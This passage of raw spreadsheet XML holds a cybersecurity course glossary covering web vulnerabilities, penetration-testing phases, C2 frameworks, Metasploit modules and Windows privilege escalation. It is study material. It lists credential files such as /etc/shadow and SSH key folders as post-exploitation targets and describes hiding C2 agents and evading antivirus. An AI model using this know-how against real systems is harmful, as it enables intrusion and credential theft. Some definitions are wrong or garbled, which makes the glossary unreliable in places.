    <t>Redundancy:</t>
  </si>
  <si>
    <t>creating duplications of critical components or systems.</t>
  </si>
  <si>
    <t>virtual private network (VPN) :</t>
  </si>
  <si>
    <t>creates a direct connection between your local network and a remote network.</t>
  </si>
  <si>
    <t>Containers:</t>
  </si>
  <si>
    <t>An alternative to VMs, for handling workloads like web servers.</t>
  </si>
  <si>
    <t>Workload:</t>
  </si>
  <si>
    <t xml:space="preserve">a type of processing that you want a server to do - e.g., processing HTTP requests, converting image formats, sending emails, etc. </t>
  </si>
  <si>
    <t>Distribution:</t>
  </si>
  <si>
    <t xml:space="preserve">The process of publishing code that you’ve written, or a server that you’ve configured, so that others can use it.
</t>
  </si>
  <si>
    <t>Packaging:</t>
  </si>
  <si>
    <t>The process of preparing your code or server in a way that makes it easy to distribute for others to install.</t>
  </si>
  <si>
    <t>Horizontal Scaling:</t>
  </si>
  <si>
    <t xml:space="preserve">Makes the system more resilient. 
Multiple machines (or containers) prevent a single point of failure, as you can redirect requests to the other machines as needed.
</t>
  </si>
  <si>
    <t xml:space="preserve">Vertical scaling:
</t>
  </si>
  <si>
    <t>Vertical scaling has a limit. 
You can only add so much RAM and CPU to one computer before you run out of resources.</t>
  </si>
  <si>
    <t>Infrastructure as code (IaC):</t>
  </si>
  <si>
    <t xml:space="preserve">Defining all of our equipment and network with code. </t>
  </si>
  <si>
    <t>Central database:</t>
  </si>
  <si>
    <t>Location where servers can send logs.</t>
  </si>
  <si>
    <t>Provisioners:</t>
  </si>
  <si>
    <t>a software application used in IaC setups that makes automated configuration changes to computers.</t>
  </si>
  <si>
    <t>Load Balancing:</t>
  </si>
  <si>
    <t>Provides the external IP address that the rest of the internet can access. Then, it receives traffic that comes into the website and distributes it across multiple servers.</t>
  </si>
  <si>
    <t>13.3 Load Balancing and Redundancy</t>
  </si>
  <si>
    <t>Health Probe :</t>
  </si>
  <si>
    <t>Regularly check all the machines behind the load balancer. Machines with issues are reported, and the load balancers stop sending traffic to those machines.</t>
  </si>
  <si>
    <t>Azure Key Vault:</t>
  </si>
  <si>
    <t>stores information securely, accessible only by specific individuals, and managed in a central location.</t>
  </si>
  <si>
    <t>Self-signed SSL:</t>
  </si>
  <si>
    <t>Digital certificate that authenticates a webapp's identity and enables an encrypted connection.</t>
  </si>
  <si>
    <t>Azure-managed certificate:</t>
  </si>
  <si>
    <t>A private certificate that's free of charge and easy to use if you just need to secure your custom domain in App Service.</t>
  </si>
  <si>
    <t>Azure Web Application Gateway:</t>
  </si>
  <si>
    <t>Web traffic load balancer that enables you to manage traffic to your web applications.</t>
  </si>
  <si>
    <t>Azure Front Door:</t>
  </si>
  <si>
    <t>Modern cloud CDN service that provides high performance, scalability, and secure experiences for your content, files and global applications.</t>
  </si>
  <si>
    <t>Denial of service :</t>
  </si>
  <si>
    <t>Make the web application unavailable.</t>
  </si>
  <si>
    <t>cross-site scripting :</t>
  </si>
  <si>
    <t>Attack in which an attacker injects malicious executable scripts into the code of a trusted application or website.</t>
  </si>
  <si>
    <t>SQL injection :</t>
  </si>
  <si>
    <t>Common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed.</t>
  </si>
  <si>
    <t>Misconfigurations:</t>
  </si>
  <si>
    <t>leaving insecure ports open on the web server, and other incorrect or ineffective security</t>
  </si>
  <si>
    <t>Web Vulnerabilities:</t>
  </si>
  <si>
    <t>a software code flaw/ bug, system misconfiguration, or some other weakness in the website/ web application or its components and processes.</t>
  </si>
  <si>
    <t>15.1: Web Vulnerabilities and Hardening</t>
  </si>
  <si>
    <t>A nonprofit foundation that works to improve the security of software through community-led open-source software projects, hundreds of local chapters worldwide, tens of thousands of members, and leading educational and training conferences.</t>
  </si>
  <si>
    <t>OWASP top 10:</t>
  </si>
  <si>
    <t>A standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications</t>
  </si>
  <si>
    <t>Web Application Developers:</t>
  </si>
  <si>
    <t>Understanding vulnerabilities and their impact can help them create secure code</t>
  </si>
  <si>
    <t>Application Security Engineers:</t>
  </si>
  <si>
    <t>Work alongside developers to ensure that they develop secure code.</t>
  </si>
  <si>
    <t>Penetration Testers:</t>
  </si>
  <si>
    <t>Need to understand web vulnerabilities, attack methods, and impacts to conduct a thorough penetration test.</t>
  </si>
  <si>
    <t>OWASP #3: Injections:</t>
  </si>
  <si>
    <t>Injection attacks occur when an attacker supplies untrusted input to an application.</t>
  </si>
  <si>
    <t>Payload:</t>
  </si>
  <si>
    <t>Malicious input, containing malicious data or code that is then processed as part of a query or command that alters the way a program is intended to function.</t>
  </si>
  <si>
    <t>Injection - Cross-Site Scripting:</t>
  </si>
  <si>
    <t>A submitted user input that can run malicious scripts against the website. It depends on the application modifying the client-side code with a user's input.</t>
  </si>
  <si>
    <t>Injection - SQL Injection:</t>
  </si>
  <si>
    <t>A submitted user input can run SQL commands against a database. Conducted by inserting malicious SQL statement into fields on a web application. It depends on the application running queries against a SQL database.</t>
  </si>
  <si>
    <t>Pre-built query:</t>
  </si>
  <si>
    <t>Looks for SQL statements and for the definition of host variable names.</t>
  </si>
  <si>
    <t>A collection of tables containing rows/records and columns.</t>
  </si>
  <si>
    <t>SQL Table:</t>
  </si>
  <si>
    <t>A whole spreadsheet of rows and columns.</t>
  </si>
  <si>
    <t>Client-side input validation:</t>
  </si>
  <si>
    <t>Coding the predefined logic into the webpage</t>
  </si>
  <si>
    <t>Server-side input validation :</t>
  </si>
  <si>
    <t>Adding the predefined logic into the code on the web server.</t>
  </si>
  <si>
    <t>HTML:</t>
  </si>
  <si>
    <t>A language used to build the structure of a webpage.</t>
  </si>
  <si>
    <t>Javascript:</t>
  </si>
  <si>
    <t>A language used to make webpages interactive and dynamic</t>
  </si>
  <si>
    <t>Client-side language:</t>
  </si>
  <si>
    <t>Designed to run on the user's client, _x000b_the browser.</t>
  </si>
  <si>
    <t>Reflected (Non-Persistent) XSS:</t>
  </si>
  <si>
    <t>Depends on the user input being immediately returned to the user and not stored on the application's server.</t>
  </si>
  <si>
    <t>Stored (Persistent) XSS:</t>
  </si>
  <si>
    <t>Depends on the user input being stored on the application's server and later retrieved by a victim accessing the web application.</t>
  </si>
  <si>
    <t>Back-end components:</t>
  </si>
  <si>
    <t>Provide file structure, content management, and access control and include back-end languages such as PHP and Java.</t>
  </si>
  <si>
    <t>15.2: Backend Components Vulnerabilities</t>
  </si>
  <si>
    <t>Back-end component Vulnerabilities:</t>
  </si>
  <si>
    <t>Allowing a malicious actor to access or display confidential files or documents that exist on an organization’s private server.</t>
  </si>
  <si>
    <t>Directory Traversal Attack:</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">Occurs when an attacker accesses files and directories from a web application outside a user’s authorized permissions.
- </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>A01: OWASP Top 10</t>
    </r>
  </si>
  <si>
    <t>Local File Inclusion Attack:</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">A web application vulnerability in which an attacker tricks the application into running unintended back-end code or scripts that are local to the application’s filesystem.
- </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>A01, A02, A05: OWASP Top 10</t>
    </r>
  </si>
  <si>
    <t>Remote File Inclusion Attack:</t>
  </si>
  <si>
    <t>A web application vulnerability in which an attacker tricks the application into running unintended back-end code or scripts that are remote to the application’s filesystem.</t>
  </si>
  <si>
    <t xml:space="preserve">Mitigation - Input Validation </t>
  </si>
  <si>
    <t>Limiting the user’s ability to modify the file being accessed, if the application does require user input when calling for files.</t>
  </si>
  <si>
    <t>Hypertext Preprocessor (PHP):</t>
  </si>
  <si>
    <t>Server-side language used to develop web applications.Used to connect to back-end databases such as MySQL and creates and works with website cookies.</t>
  </si>
  <si>
    <t>Remote code execution (RCE):</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">Attack in which a malicious actor can execute arbitrary commands on a target machine.
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>- A01, A02, A05: OWASP Top 10</t>
    </r>
  </si>
  <si>
    <t>Burp Suite:</t>
  </si>
  <si>
    <t xml:space="preserve">Popular web application security tool, to automate processes, capture, display, and modify web app requests and responses, and use other built-in features to test for vulnerabilities. </t>
  </si>
  <si>
    <t>15.3 Web App Tool Time</t>
  </si>
  <si>
    <t>Burp Repeater:</t>
  </si>
  <si>
    <t>Tool to test for session management vulnerabilities.</t>
  </si>
  <si>
    <t>Burp Intruder:</t>
  </si>
  <si>
    <t xml:space="preserve">Identification and Authentication Failures (A07): </t>
  </si>
  <si>
    <t>Risks that permit an attacker to either access or bypass the authentication methods that are used by a web application.</t>
  </si>
  <si>
    <t>FoxyProxy:</t>
  </si>
  <si>
    <t>Simplifies configuring browsers to access proxy-servers, offering more features than other proxy-plugins.</t>
  </si>
  <si>
    <t>Web Proxy:</t>
  </si>
  <si>
    <t>An intermediary between the client and the server. Internet traffic flows through the proxy on the way to its intended destination.</t>
  </si>
  <si>
    <t>Unique server-side sets of user data that are used to customize webpages for the specific user accessing them</t>
  </si>
  <si>
    <t>Session Hijacking</t>
  </si>
  <si>
    <t>Occurs when a malicious user obtains another user’s unique session cookie and hijack the user’s private session</t>
  </si>
  <si>
    <t>Sniffing traffic:</t>
  </si>
  <si>
    <t>If a malicious user can sniff unencrypted traffic, 
 then they can potentially capture the session cookie and take over a user’s session.</t>
  </si>
  <si>
    <t>Client-side attacks:</t>
  </si>
  <si>
    <t>A malicious user can deploy a cross-site scripting attack to steal a user’s session cookie.</t>
  </si>
  <si>
    <t>Predictable sessions:</t>
  </si>
  <si>
    <t>A malicious user can predict what a unique 
 session cookie might be.</t>
  </si>
  <si>
    <t>Brute Force Attack :</t>
  </si>
  <si>
    <t>Systematically attempting many passwords, or username/password combinations, with the hope of determining the correct result to obtain access in an unauthorized area.</t>
  </si>
  <si>
    <t>Credential Stuffing:</t>
  </si>
  <si>
    <t>Using lists of usernames to conduct brute force attacks that were obtained from breaches of other websites</t>
  </si>
  <si>
    <t>Password Spraying:</t>
  </si>
  <si>
    <t>Using a single weak password, such as “123456”, against a large list of usernames.</t>
  </si>
  <si>
    <t>BeEF Hook</t>
  </si>
  <si>
    <t>Small snippet of code</t>
  </si>
  <si>
    <t>Hooked</t>
  </si>
  <si>
    <t>What happens to a browser when subsequent users access the infected website</t>
  </si>
  <si>
    <t>An infected hooked browser that awaits instructions.</t>
  </si>
  <si>
    <t>Penetration testing:</t>
  </si>
  <si>
    <t>The offensive security practice of attacking a network using the same techniques that a malicious hacker would use, in an effort to identify security holes and raise awareness within an organization.</t>
  </si>
  <si>
    <t>16.1 Introduction to Pentesting</t>
  </si>
  <si>
    <t>Pentest P1 - Planning:</t>
  </si>
  <si>
    <t>An interaction between the organization and the pen testing team. It helps the pen testers thoroughly understand the client’s needs before beginning the test.</t>
  </si>
  <si>
    <t>Pentest P2 - Reconnaissance:</t>
  </si>
  <si>
    <t xml:space="preserve">Gathering information about your target. </t>
  </si>
  <si>
    <t>Pentest P3 - Scanning:</t>
  </si>
  <si>
    <t>The second phase of pen testing. Scanning uses tools to gather information such as network information and potential vulnerabilities</t>
  </si>
  <si>
    <t>Pentest P4 - Exploitation:</t>
  </si>
  <si>
    <t>Pentest P5 - Post exploitation:</t>
  </si>
  <si>
    <t>Involves multiple steps, typically used to accomplish enumeration and searching for useful data, Persistence, Privilege Escalation.</t>
  </si>
  <si>
    <t>Pentest P6 - Reporting:</t>
  </si>
  <si>
    <t>Report on the previous five steps to provide a summary of actions taken, findings, and recommended mitigations.</t>
  </si>
  <si>
    <t>Purpose:</t>
  </si>
  <si>
    <t>Defined by the business’s needs and which assets the business is most interested in protecting.</t>
  </si>
  <si>
    <t>Scope:</t>
  </si>
  <si>
    <t>Defined by which machines and networks are off limits to pen testers and should not be targeted for attack.</t>
  </si>
  <si>
    <t>Black Box Pen Testing (no view):</t>
  </si>
  <si>
    <t>Pen tester simulates a malicious hacker who has no prior knowledge of the target system and network.
- The pen tester is paid to learn and exploit as much as they can about the network using only the tools publicly available to an attacker on the internet.</t>
  </si>
  <si>
    <t>White Box Pen Testing (Full-View view):</t>
  </si>
  <si>
    <t>Pen tester is given full knowledge of the system or network. 
- Most appropriate when the client wants a detailed analysis of all potential security flaws, rather than exposed and visible vulnerabilities.</t>
  </si>
  <si>
    <t>Grey Box Pen Testing (Partial view):</t>
  </si>
  <si>
    <t>Pen testing is performed by the in-house system or network admin.</t>
  </si>
  <si>
    <t>Statement of Work (SOW) :</t>
  </si>
  <si>
    <t>Outlines the scope of the test, the timeline, the points of contact, and how the test will be conducted.</t>
  </si>
  <si>
    <t>MITRE ATT&amp;CK matrix:</t>
  </si>
  <si>
    <t>Provide a visual representation of all the techniques, tactics, and procedures (TTPs) that may be performed throughout an assessment.</t>
  </si>
  <si>
    <t>MITRE ATT&amp;CK Tactics / Headers:</t>
  </si>
  <si>
    <t>Tactics of a tactic, listed as a header.</t>
  </si>
  <si>
    <t>MITRE ATT&amp;CK Techniques / Rows:</t>
  </si>
  <si>
    <t>Rows under a header, signifying a techniquye of an attack.</t>
  </si>
  <si>
    <t>Passive Recon or to Open Source Intelligence (OSINT) :</t>
  </si>
  <si>
    <t>Leverages information about the target that is publicly available on the internet. Includes all domains and hosts belonging to a target that are publicly viewable.</t>
  </si>
  <si>
    <t>Active Recon:</t>
  </si>
  <si>
    <t>Gathering information about the target, but it involves directly interacting with the target.</t>
  </si>
  <si>
    <t>External Reconnaissance:</t>
  </si>
  <si>
    <t>Recon conducted from the target.</t>
  </si>
  <si>
    <t>Internal Reconnaissance:</t>
  </si>
  <si>
    <t>After accessing the target the target.</t>
  </si>
  <si>
    <t>Google Dorking:</t>
  </si>
  <si>
    <t>Enables us to manipulate Google searches to narrow down our queries in order to acquire actionable intel.
- Search Open Websites/Domains: Search Engines, ID T1593-002 (MITRE)</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>Shodan.io</t>
    </r>
    <r>
      <rPr>
        <b/>
      </rPr>
      <t>:</t>
    </r>
  </si>
  <si>
    <t>Conducts port scanning across the entire internet and catalogs the results _x000b_for quick searching.</t>
  </si>
  <si>
    <t xml:space="preserve">Certificate transparency:
</t>
  </si>
  <si>
    <t>Reconnaissance tactic where a penetration tester can gather information from certificate issuers, which publish logs of the SSL/TLS certificates that they issue to organizations.
- Attackers can exploit certificate transparency to search for subdomains. (crt.sh)</t>
  </si>
  <si>
    <t>Recon-ng:</t>
  </si>
  <si>
    <t>Web reconnaissance framework written in Python.</t>
  </si>
  <si>
    <t>Initial Access:</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Consists of techniques that use various entry vectors to gain their initial foothold within a network. 
- </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>Tactic ID TA0001</t>
    </r>
  </si>
  <si>
    <t>16.2 Initial Access and Internal Recon</t>
  </si>
  <si>
    <t>Techniques:</t>
  </si>
  <si>
    <t xml:space="preserve">Used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. </t>
  </si>
  <si>
    <t>Footholds:</t>
  </si>
  <si>
    <t>Gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.</t>
  </si>
  <si>
    <t>Phishing:</t>
  </si>
  <si>
    <t>The attacker crafts a fraudulent email that misleads the recipient into clicking on a link in the email.</t>
  </si>
  <si>
    <t>Remote Services through Valid Accounts:</t>
  </si>
  <si>
    <t>Gaining access to the target by guessing credentials on a VPN login portal. These techniques are categorized by MITRE as Valid Accounts and External Remote Services.</t>
  </si>
  <si>
    <t>Phishing - Typosquatting:</t>
  </si>
  <si>
    <t>A common tactic in which an attacker will register a fraudulent domain similar to a legitimate one. For example: 
Google.com vs. GoogIe.com (with a capital “i” instead of a lowercase “l”)</t>
  </si>
  <si>
    <t>Phishing - Typo:</t>
  </si>
  <si>
    <t>In the body of the email and the sender’s email address are common flags.</t>
  </si>
  <si>
    <t>Phishing - Subdomains:</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Are often registered to mimic real domains.
- For example: payments.google.com vs. </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>paymentsgoogle.bogusdomain.com</t>
    </r>
  </si>
  <si>
    <t>Valid Accounts:</t>
  </si>
  <si>
    <t xml:space="preserve">The attacker uses real user accounts to gain access.
</t>
  </si>
  <si>
    <t>Remote Services:</t>
  </si>
  <si>
    <t>The attacker uses remote services such as VPN to try and gain access from outside of the target’s network.</t>
  </si>
  <si>
    <t>Password Guessing:</t>
  </si>
  <si>
    <t>The systematic method of guessing passwords to obtain access into a target.</t>
  </si>
  <si>
    <t>Internal Recon - Host Enumeration:</t>
  </si>
  <si>
    <t>Information about the host</t>
  </si>
  <si>
    <t>Internal Recon - Process Enumeration:</t>
  </si>
  <si>
    <t>Information about processes on the system</t>
  </si>
  <si>
    <t>Scanning:</t>
  </si>
  <si>
    <t xml:space="preserve">Zenmap </t>
  </si>
  <si>
    <t>GUI based nmap tool</t>
  </si>
  <si>
    <t>Vulnerability Scanning:</t>
  </si>
  <si>
    <t>Identifies systems that have known vulnerabilities.
- Scans use a database of known vulnerabilities, Vulnerabilities are rated based on the severity level, Vulnerabilities are given a Common Vulnerability Scoring System (CVSS) score.</t>
  </si>
  <si>
    <t xml:space="preserve">Penetration testing
</t>
  </si>
  <si>
    <t>Attempts to identify weaknesses that can be exploited
- Specific system configurations, Organizational processes and practices</t>
  </si>
  <si>
    <t>Nessus:</t>
  </si>
  <si>
    <t>Vulnerability Scanning tool</t>
  </si>
  <si>
    <t>Exploit Database (Exploit-DB) :</t>
  </si>
  <si>
    <t>Popular online database that contains publicly disclosed exploits, cataloged according to their Common Vulnerability and Exposure (CVE) identifiers.</t>
  </si>
  <si>
    <t>Common Vulnerability and Exposure (CVE):</t>
  </si>
  <si>
    <t>A list of publicly disclosed information security vulnerabilities and exposures.</t>
  </si>
  <si>
    <t>Shell</t>
  </si>
  <si>
    <t>Exploited access to the machine granted in the form of terminal access.</t>
  </si>
  <si>
    <t>Terminal</t>
  </si>
  <si>
    <t>Opening a terminal on your Kali machine is opening a “shell”.</t>
  </si>
  <si>
    <t xml:space="preserve">Remote Shell: </t>
  </si>
  <si>
    <t>Shell opened on a remote computer on the network</t>
  </si>
  <si>
    <t>Bind shell:</t>
  </si>
  <si>
    <t>The remote host opens a port for the current host to connect to. The current, local host then connects to that remote host’s port.</t>
  </si>
  <si>
    <t>Reverse shell:</t>
  </si>
  <si>
    <t xml:space="preserve">The remote host connects back to a port on the local host.
</t>
  </si>
  <si>
    <t>Command and control (C2):</t>
  </si>
  <si>
    <t>A framework that consists of tools and techniques that attackers use to maintain communication with compromised devices following initial exploitation.</t>
  </si>
  <si>
    <t>16.3  Exploring Exploitation</t>
  </si>
  <si>
    <t>Metasploit:</t>
  </si>
  <si>
    <t>Popular and open source C2 framework created by Rapid7. Contains a suite of tools for hacking servers and other networked devices. Expands on its exploitation and C2 capabilities. Metasploit also has tools for port and service scanning as well as enumeration.</t>
  </si>
  <si>
    <t>C2 Server:</t>
  </si>
  <si>
    <t>The attacker’s server, where the attacker communicates with the compromised machines.</t>
  </si>
  <si>
    <t>C2’s Agent:</t>
  </si>
  <si>
    <t>The payload that is run on the compromised machine in order to open up a connection back to the C2 server.</t>
  </si>
  <si>
    <t>Zombie:</t>
  </si>
  <si>
    <t>An infected client that awaits instruction.</t>
  </si>
  <si>
    <t>Botnet:</t>
  </si>
  <si>
    <t>Formation of multiple zombies and controlled through a single C2 server.</t>
  </si>
  <si>
    <t>C2 Matrices - Information</t>
  </si>
  <si>
    <t>Contains the version number reviewed.</t>
  </si>
  <si>
    <t>C2 Matrices - Code + UI</t>
  </si>
  <si>
    <t>Contains the server and agent language used.</t>
  </si>
  <si>
    <t>C2 Matrices - Channels</t>
  </si>
  <si>
    <t>Contains the supported channels.</t>
  </si>
  <si>
    <t>C2 Matrices - Agents</t>
  </si>
  <si>
    <t>Contains the supported OS.</t>
  </si>
  <si>
    <t>C2 Matrices - Capabilities</t>
  </si>
  <si>
    <t>Contains other available capabilities.</t>
  </si>
  <si>
    <t>C2 Matrices - Support</t>
  </si>
  <si>
    <t>Contains the additional support provided.</t>
  </si>
  <si>
    <t>MS - MSFconsole:</t>
  </si>
  <si>
    <t>MS - Meterpreter:</t>
  </si>
  <si>
    <t>MS - msfvenom:</t>
  </si>
  <si>
    <t>MS Console Modules - Auxiliary:</t>
  </si>
  <si>
    <t>Used for information gathering, enumeration, and port scanning. Can also be used for things like connecting to SQL databases and performing man-in-the-middle attacks.</t>
  </si>
  <si>
    <t>MS Console Modules - Exploit:</t>
  </si>
  <si>
    <t>Generally used to deliver exploit code to a target system.</t>
  </si>
  <si>
    <t>MS Console Modules - Post:</t>
  </si>
  <si>
    <t>Offers post-exploitation tools such as the ability to extract password hashes and access tokens. Provides modules for taking a screenshot, key-logging, and downloading files.</t>
  </si>
  <si>
    <t>MS Console Modules - Payload:</t>
  </si>
  <si>
    <t>Used to create malicious payloads to use with an exploit. If possible, the aim is to upload a copy of Meterpreter, which is Metasploit’s default payload.</t>
  </si>
  <si>
    <t>MS Console Modules - Encoder:</t>
  </si>
  <si>
    <t>Encoders ensure that payloads make it to their destination intact.</t>
  </si>
  <si>
    <t>Post Exloitation - Enumeration and searching for useful data:</t>
  </si>
  <si>
    <t>Enumeration and search for data from inside the target after it has been exploited. EG, Current User context, List of users on machines, current user access, identification of any defensive countermeasures.</t>
  </si>
  <si>
    <t>Post Exloitation - Persistence:</t>
  </si>
  <si>
    <t>The process of attempting to maintain long-term access to your target.</t>
  </si>
  <si>
    <t>Post Exloitation - Privilege Escalation:</t>
  </si>
  <si>
    <t>The process of escalating privileges from a less-privileged user to a more-privileged user (or a low-privilege to high-privilege user).</t>
  </si>
  <si>
    <t xml:space="preserve">Low-Privilege Tasks:
</t>
  </si>
  <si>
    <t>Require minimal permissions and include Gathering system/OS details, Gathering services and versions, and Getting a list of users and groups.</t>
  </si>
  <si>
    <t>High-Privilege Tasks:</t>
  </si>
  <si>
    <t>Require sudo or root privileges and include Reading sensitive files, such as /etc/shadow and SSH keys, Creating users and assigning them to privileged groups,  Installing new services, The majority of persistence tasks.</t>
  </si>
  <si>
    <t>High-Privilege Escalation:
/var/lib/mysql/mysql/user.MYD</t>
  </si>
  <si>
    <t>Is the MySQL database file, which may contain SQL login credentials.</t>
  </si>
  <si>
    <t>16.4  Post-Exploitation and Reporting</t>
  </si>
  <si>
    <t>High-Privilege Escalation:
/home/[USER]/.bash_history</t>
  </si>
  <si>
    <t>Contains a history of a user’s bash commands.</t>
  </si>
  <si>
    <t>High-Privilege Escalation:
/home/[USER]/.ssh/</t>
  </si>
  <si>
    <t>Contains private SSH keys.</t>
  </si>
  <si>
    <t xml:space="preserve">High-Privilege Escalation:
/etc/shadow </t>
  </si>
  <si>
    <t xml:space="preserve">Contains password hash, can be cracked to retrieve the user’s original password.
</t>
  </si>
  <si>
    <t>High-Privilege Escalation:
/etc/passwd</t>
  </si>
  <si>
    <t>Contains a list of the system's accounts, giving for each account some useful information like user ID</t>
  </si>
  <si>
    <t>Persistence:</t>
  </si>
  <si>
    <t>Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.</t>
  </si>
  <si>
    <t>Pers Tech 1 - Utilizing Existing Services:</t>
  </si>
  <si>
    <t>Less about exploitation of vulnerable software and services and more about utilizing existing system services.</t>
  </si>
  <si>
    <t>Pers Tech 2 - Blending into the Environment:</t>
  </si>
  <si>
    <t>Ensuring that the attacker’s work blends in with the current environment and can’t be detected.
Knowledge of the system you’re on is crucial for this.</t>
  </si>
  <si>
    <t>Pers Tech 3 - Maintaining Current Level of Access:</t>
  </si>
  <si>
    <t>Establish persistence as a low-privilege user before privilege escalation, just in case you lose access to the machine.
You should then re-establish persistence as an elevated user.
It’s important to establish persistence and ensure persistence with the highest privileges possible, to avoid having to re-step through the privilege-escalation phase.</t>
  </si>
  <si>
    <t>Pers Tech 4 -Privesc Persistence:</t>
  </si>
  <si>
    <t>Purposely establishing opportunities for low-privilege users to escalate their privileges.</t>
  </si>
  <si>
    <t>Technique:</t>
  </si>
  <si>
    <t>How a specific tactic is carried out.</t>
  </si>
  <si>
    <t>17.1 Introduction to Windows Penetration Testing</t>
  </si>
  <si>
    <t>Windows Authentication -  Kerberos:</t>
  </si>
  <si>
    <t>Default protocol for authentication in Windows and is heavily used in Active Directory.</t>
  </si>
  <si>
    <t>Windows Authentication - New Technology LAN Manager (NTLM):</t>
  </si>
  <si>
    <t xml:space="preserve">A “challenge-response” protocol and uses a three-step method, consisting of Negotiation message from the client, Challenge message from the server, and Authentication message from the client. </t>
  </si>
  <si>
    <t>Key Distribution Center (KDC),:</t>
  </si>
  <si>
    <t>Ticket Granting Ticket (TGT).:</t>
  </si>
  <si>
    <t>AS-REQ (authentication service request):</t>
  </si>
  <si>
    <t>AS-REP (authentication service reply):</t>
  </si>
  <si>
    <t>Security Account Manager (SAM):</t>
  </si>
  <si>
    <t>Area of windows machine whereby Local passwords are stored in.</t>
  </si>
  <si>
    <t>Password Spraying :</t>
  </si>
  <si>
    <t>Involves getting a list of usernames and attempting a single password for those accounts.</t>
  </si>
  <si>
    <t>Windows AD:</t>
  </si>
  <si>
    <t>Directory services such as the administration of users, computers, and policies. AD needs several ports open to properly communicate between the DC and workstations on the network, eg. 445 (SMB) abd 135 (RPC).</t>
  </si>
  <si>
    <t>Local Link Multicast Name Resolution (LLMNR) :</t>
  </si>
  <si>
    <t>An older broadcast protocol that serves as a local backup for DNS. broadcast protocol, meaning an LLMNR request is sent out to the entire network instead of going to a single host.</t>
  </si>
  <si>
    <t>LLMNR Listening:</t>
  </si>
  <si>
    <t>Listening for LLMNR request broadcasts on the network and spoofing (faking) a response to _x000b_the request</t>
  </si>
  <si>
    <t>LLMNR Asking:</t>
  </si>
  <si>
    <t>Asking for the requesting computer to complete a password challenge</t>
  </si>
  <si>
    <t>Windows Management Instrumentation (WMI):</t>
  </si>
  <si>
    <t>A Microsoft tool created with the intention of remotely administering Windows machines. Operates over RPC, which is port 135.</t>
  </si>
  <si>
    <t>The shell code that runs when an exploit successfully compromises a system.</t>
  </si>
  <si>
    <t>17.2 Windows Exploitation, Privilege Escalation, and Credential Access</t>
  </si>
  <si>
    <t>Remote Code Execution (RCE):</t>
  </si>
  <si>
    <t>Uploading data to remote machines including custom payloads.</t>
  </si>
  <si>
    <t>Metasploit framework tool that generates and encodes payloads.</t>
  </si>
  <si>
    <t>act of converting plaintext into a coded form, and used to evade IDS and AV solutions</t>
  </si>
  <si>
    <t>Meterpreter :</t>
  </si>
  <si>
    <t>Upload and download files to and from a target, Set up port forwarding through the target. Switch between Meterpreter shells, and Run Metasploit modules on remote hosts.</t>
  </si>
  <si>
    <t>Domain Administrators group:</t>
  </si>
  <si>
    <t>High privilege AD group that can create new users, reset passwords, and modify group policies.</t>
  </si>
  <si>
    <t>Administrators:</t>
  </si>
  <si>
    <t>Admin group for local machine, allowing the user to create new local users, assign them to local groups, reset passwords, etc.</t>
  </si>
  <si>
    <t>Local Administrator:</t>
  </si>
  <si>
    <t>A high-privilege role that also allows high access to the operating system. The user may access any folder or files and modify the permissions on them.</t>
  </si>
  <si>
    <t>SYSTEM group:</t>
  </si>
  <si>
    <t>Technically the computer account. Computer accounts always have full access to their own machine.</t>
  </si>
  <si>
    <t>User Account Control:</t>
  </si>
  <si>
    <t>Windows security feature that applies the principle of least privilege, meaning that the only time administrative access should be used is when it is needed.</t>
  </si>
  <si>
    <t>Access Token:</t>
  </si>
  <si>
    <t>Object that describes the security context of a process or thread. The information in a token includes the identity and privileges of the user account associated with the process or thread. When a user logs on, the system verifies the user’s password by comparing it with information stored in a security database. If the password is authenticated, the system produces an access token. Every process executed on behalf of this user has a copy of this access token.</t>
  </si>
  <si>
    <t>Split Token:</t>
  </si>
  <si>
    <t xml:space="preserve">In Windows, administrators have a split token, meaning they log on with standard user permissions. Their administrator permissions are not present until they specifically ask for them </t>
  </si>
  <si>
    <t>Privilege Escalation Techniques in Windows:</t>
  </si>
  <si>
    <t>1. Low-privilege user &gt; High-privilege user &gt; SYSTEM
2. High-privilege user &gt; SYSTEM</t>
  </si>
  <si>
    <t xml:space="preserve">Process migration / process injection: </t>
  </si>
  <si>
    <t>Moving the active process of the C2 agent to another active process. Essentially, it allows a current process to “inject” or “migrate” its data into another process. The old process takes the name of the new, migrated process.
To conceal the identity of a C2 agent
To move to a more stable process</t>
  </si>
  <si>
    <t>Windows Persistence:</t>
  </si>
  <si>
    <t>To establish a continuous method of access to the compromised machine or network in case the initial connection is severed.</t>
  </si>
  <si>
    <t>Security Accounts Manager (SAM) :</t>
  </si>
  <si>
    <t>Database file in Windows XP, Windows Vista, Windows 7, 8.1, 10 and 11 that stores users' passwords.</t>
  </si>
  <si>
    <t>17.3 Windows Persistence, Lateral Movement, Credential Access, and Review</t>
  </si>
  <si>
    <t>Local Security Authority Subsystem Service (LSASS):</t>
  </si>
  <si>
    <t>A process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system.</t>
  </si>
  <si>
    <t>Windows Credentials Refreshe - Local Account:</t>
  </si>
  <si>
